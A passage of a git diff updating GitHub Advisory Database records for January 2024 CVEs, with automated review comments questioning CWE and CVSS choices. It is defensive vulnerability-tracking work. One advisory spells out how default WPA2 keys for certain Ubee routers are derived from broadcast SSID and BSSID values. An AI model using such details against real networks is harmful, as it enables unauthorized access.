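Review bot: `CWE-384` (Session Fixation) in the second hunk of GHSA-jggj-wjwc-8gg9 does not describe the defect in the details, which is that `mbedtls_ssl_session_reset` carries the previously negotiated protocol version forward as the new maximum; nothing in the description involves an attacker fixing a session identifier. The described effect is a persistent version downgrade on a reused context (one that once negotiated TLS 1.2 can no longer offer 1.3), which reads as CWE-757 (Selection of Less-Secure Algorithm During Negotiation) or CWE-665 (Improper Initialization), e.g. `"cwe_ids": ["CWE-757"]`. The `I:H` in the added vector also deserves a second look: being held at TLS 1.2 is a downgrade to a still-secure version, so confirm with the fix release notes (the details say through 3.5.1) whether any integrity impact beyond that is claimed before the HIGH severity is accepted.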
+++ b/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jh2c-2h3p-fcj3", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38625" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38624.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json b/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json index 3ab89453fb4bd..0f49d858b4f60 100644 --- a/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json +++ b/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jhhh-mxj4-r289", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-03T00:31:32Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2024-22860" ], "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:48Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json b/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json new file mode 100644 index 0000000000000..52197f5898e73 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhv9-m6q4-wc38", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1114" + ], + "details": "A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function dlfile of the file /application/index/controller/Screen.php. The manipulation of the argument fileUrl leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252472.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1114" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/9wv48TygKRxo" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252472" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252472" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file 
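Review bot: `CWE-284` (Improper Access Control) in the new GHSA-jhv9-m6q4-wc38 is the generic parent category and, together with `C:N` in the vector, sits oddly against details describing manipulation of a `fileUrl` argument to a `dlfile` function in `Screen.php`; a download routine fed an attacker-controlled URL would ordinarily be an SSRF (CWE-918) or external control of a file path (CWE-73) with some confidentiality impact, though that is only an inference from the names. A reviewer should read the linked write-up and replace CWE-284 with the specific child weakness it supports, and confirm whether `C:N` is justified. Until then the MODERATE bucket reflects the VulDB/NVD vector rather than an assessment of the function.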
diff --git a/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json b/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json index 8fa2291080e71..a5cdec42a681a 100644 --- a/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json +++ b/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jj7g-c984-hr2m", - "modified": "2024-01-21T06:30:22Z", + "modified": "2024-01-29T15:30:23Z", "published": "2024-01-21T06:30:22Z", "aliases": [ "CVE-2024-23726" ], "details": "Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-798" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T04:15:19Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json b/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json index 5cbed3aa5addc..63a8d0a6b8b45 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json +++ b/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json 
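Review bot: `CWE-798` (Use of Hard-coded Credentials) in the second hunk of GHSA-jj7g-c984-hr2m is a loose fit for what the details describe: the WPA2 PSK is not a fixed secret but is derived from the SSID and BSSID broadcast in beacon frames, so the weakness is a predictable credential-generation scheme. CWE-1391 (Use of Weak Credentials) or CWE-330 (Use of Insufficiently Random Values) better capture a PSK that any nearby observer can compute; `"cwe_ids": ["CWE-1391", "CWE-330"]` would make the classification match the description. The `AV:A` in the added vector is correct for a Wi-Fi-proximity attacker and the rest of the vector is consistent with gaining full network access, so only the CWE needs a reviewer's attention.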
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjfr-pq2x-mf69", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52331" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json b/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json new file mode 100644 index 0000000000000..a3df0253fc000 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json 
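Review bot: The vector added for GHSA-jjfr-pq2x-mf69 (CVE-2023-52331, `C:H/I:L/A:N`, severity HIGH) and the one added in this same change set for GHSA-jh2c-2h3p-fcj3 (CVE-2023-38625, `C:L/I:L/A:N`, severity MODERATE) score what the two descriptions present as the same post-authenticated SSRF in Trend Micro Apex Central, the only textual difference being the build number cited in 38625. Unless the vendor bulletin distinguishes which internal services each one can reach, one of the confidentiality ratings is likely wrong; a reviewer should check the Trend Micro advisory and align the two, or record why `C` differs. Both vectors are NVD-supplied, so this is a flag for review, not a local edit.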
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjqj-xq2v-c8jx", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-1112" + ], + "details": "Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1112" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json b/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json new file mode 100644 index 0000000000000..0ea5f993c1da4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json 
@@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjr8-97p7-vmmg", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-6780" + ], + "details": "An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6780" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6780" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254396" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-01" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-131" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json b/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json index d10c1b0069c88..6b720dd04c379 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json +++ b/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjrm-h8pr-rf2f", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0743" ], "details": "An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-252" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json b/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json index 95b3403b8e03d..de8d7023d5fd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json +++ b/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjwf-q2q5-945c", - "modified": "2024-01-23T12:30:29Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:29Z", "aliases": [ "CVE-2023-46343" ], "details": "In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json b/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json index 49ce71bff9704..995ead1d8f893 100644 --- a/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json +++ b/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jm27-8g8p-3jmp", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47194" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47195.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json new file mode 100644 index 0000000000000..5abeb59efd88e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jm98-mxmf-qcjw", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24330" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the port or enable parameter in the setRemoteCfg function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24330" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/14/TOTOlink%20A3300R%20setRemoteCfg.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json b/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json new file mode 100644 index 0000000000000..37a148d56fc97 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpj8-v3w8-6gx3", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22302" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ignazio Scimone Albo Pretorio On line allows Stored XSS.This issue affects Albo Pretorio On line: from n/a through 4.6.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22302" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json b/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json new file mode 100644 index 0000000000000..b153304afa795 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr2v-748r-frvv", + "modified": "2024-01-30T00:30:29Z", + "published": "2024-01-30T00:30:29Z", + "aliases": [ + "CVE-2024-1021" + ], + "details": "A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1021" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252290" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252290" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T22:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json b/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json new file mode 100644 index 0000000000000..236195ca5dcd5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jrjh-cm7j-j4fh", + "modified": "2024-01-31T15:30:19Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2024-1087" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-1085.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1087" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json b/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json index 5cc1eb5c5666d..fe896f058238e 100644 --- a/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json +++ b/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jw42-5m4v-9c8g", - "modified": "2024-01-09T18:30:27Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-09T18:30:27Z", "aliases": [ "CVE-2024-0057" @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0007/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json b/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json index 384edc59b83c1..9f84a05d01f4f 100644 --- a/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json +++ b/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json 
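Review bot: This record is created for a CVE that `details` itself says has been rejected as a duplicate of CVE-2024-1085, yet nothing in the JSON marks it as withdrawn; `severity` and `cwe_ids` are simply left empty, which consumers will read as an unscored open advisory rather than a void id. The OSV schema the file declares (`"schema_version": "1.4.0"`) has a top-level `withdrawn` timestamp for exactly this case, so if the import pipeline supports it the record should carry `"withdrawn": "2024-01-31T15:30:19Z"` (or the actual rejection time) and ideally point at the surviving id via `"related": ["CVE-2024-1085"]`. If the pipeline cannot set those fields, the rejection should be surfaced somewhere other than free text in `details`, since the NVD reference alone does not tell a client the id is dead.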
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jx5w-px6r-88w4", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0747" ], "details": "When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json b/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json index 04bb5a376f849..2e2e4e3a1f1c3 100644 --- a/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json +++ b/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jxfv-m3f6-ch5r", - "modified": "2024-01-24T00:30:33Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:33Z", "aliases": [ "CVE-2024-0814" ], "details": "Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ 
@@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json b/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json index 7cddab10c9daa..63abc0907c0c2 100644 --- a/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json +++ b/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m2r6-996j-pvf6", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0804" ], "details": "Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json b/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json new file mode 100644 index 0000000000000..9823290b1e815 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json 
